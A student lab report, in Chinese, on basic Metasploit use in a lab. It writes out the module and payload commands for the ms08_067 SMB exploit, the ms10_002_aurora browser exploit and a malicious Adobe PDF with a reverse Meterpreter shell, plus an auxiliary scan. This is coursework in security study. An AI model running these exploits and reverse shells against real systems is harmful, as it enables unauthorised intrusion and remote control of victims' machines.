1. 程式人生 > >20155304《網絡對抗》MSF基礎應用

20155304《網絡對抗》MSF基礎應用

目標 str 服務 row 就會 HA 問題 pre 基礎

20155304《網絡對抗》MSF基礎應用

實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

1.1一個主動攻擊實踐,如ms08_067;

1.2 一個針對瀏覽器的攻擊,如ms11_050;

1.3 一個針對客戶端的攻擊,如Adobe;

1.4 成功應用任何一個輔助模塊。

1.1主動攻擊:ms08_067

使用靶機1和Kali

先msfconsole進入msf,再用search ms08_067查詢一下針對該漏洞的攻擊模塊:

技術分享圖片

用use exploit/windows/smb/ms08_067_netapi使用該模塊

用show targets查看可以被攻擊的靶機的操作系統型號:

技術分享圖片

用show payloads查看可以供我們使用的攻擊載荷:

技術分享圖片

從中找到一個可用的攻擊載荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp設置payload:

用show options查看需要設置的參數:

技術分享圖片

這裏需要設置RHOST(靶機IP)和LHOST(Kali的IP)

技術分享圖片

設置target選項目標

技術分享圖片

用show options確認需要設置的參數是否已經設置好:

技術分享圖片

用exploit指令開始攻擊

攻擊成功後會獲取靶機的shell,可以對其進行操作:

技術分享圖片

1.2針對瀏覽器的攻擊:MS10_002_aurora漏洞攻擊

msf > use windows/browser/ms10_002_aurora調用出該模塊,然後設置tcp反彈連接

技術分享圖片

查看需要修改的參數

技術分享圖片

SRVHOST和LHOST的ip為攻擊機的ip。設置好參數後,exploit

技術分享圖片

攻擊成功,輸入sessions -i -1,查看XP桌面信息

技術分享圖片

還有靶機的ip信息等

技術分享圖片

1.3針對客戶端的攻擊:adobe_toolbutton

用search adobe查詢一下針對該漏洞的攻擊模塊:

技術分享圖片

選擇一個模塊使用

用show targets查看可以被攻擊的靶機的操作系統型號:

技術分享圖片

技術分享圖片

,使用命令set payload windows/meterpreter/reverse_tcp設置payload攻擊載荷

用show options查看需要設置的參數:

技術分享圖片

技術分享圖片

設置相應參數,實施exploit攻擊,在/root/.msf4/local/目錄下成功生成了一.pdf文件

將pdf文件粘貼到靶機win xp

在kali中和前幾次實驗一樣打開並設置監聽模塊use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再設置IP以及端口

技術分享圖片

在靶機上打開剛剛那個pdf文件,可以觀察到Kali成功獲取了靶機的shell,可以對其進行操作:

技術分享圖片

1.4 成功應用任何一個輔助模塊:

查看都有什麽輔助模塊:

技術分享圖片

我選擇了這個

技術分享圖片

info查看、設置好要設置的參數

技術分享圖片

可以查看系統信息了:

技術分享圖片

基礎問題回答

(1)用自己的話解釋什麽是exploit,payload,encode.

exploit:是破除門鎖的工具以及運送間諜的載具,相當於利用漏洞偷偷打開的管道,將做好的木馬病毒等順利傳輸到靶機。

payload:就是被運送的間諜,到了房子裏頭就可以執行各種間諜活動。簡單來說就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,然後通過管道傳輸進去後開始為我們控制靶機服務。

encode:是間諜穿的偽裝的衣服,便於間諜潛入目標針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特征,但是不改變payload為我們所用的特征,但能對payload進行加工。

實驗總結和收獲

通過這次實驗,我了解到了msf平臺的厲害,不僅可以利用多種輔助模塊獲取靶機信息,還能夠查看大部分存在的漏洞並利用這些漏洞實現不同攻擊,這裏面,更是可以直接實現主動攻擊,只要系統存在這個漏洞,就會被直接攻破,看來,實時更新系統是很有必要的

20155304《網絡對抗》MSF基礎應用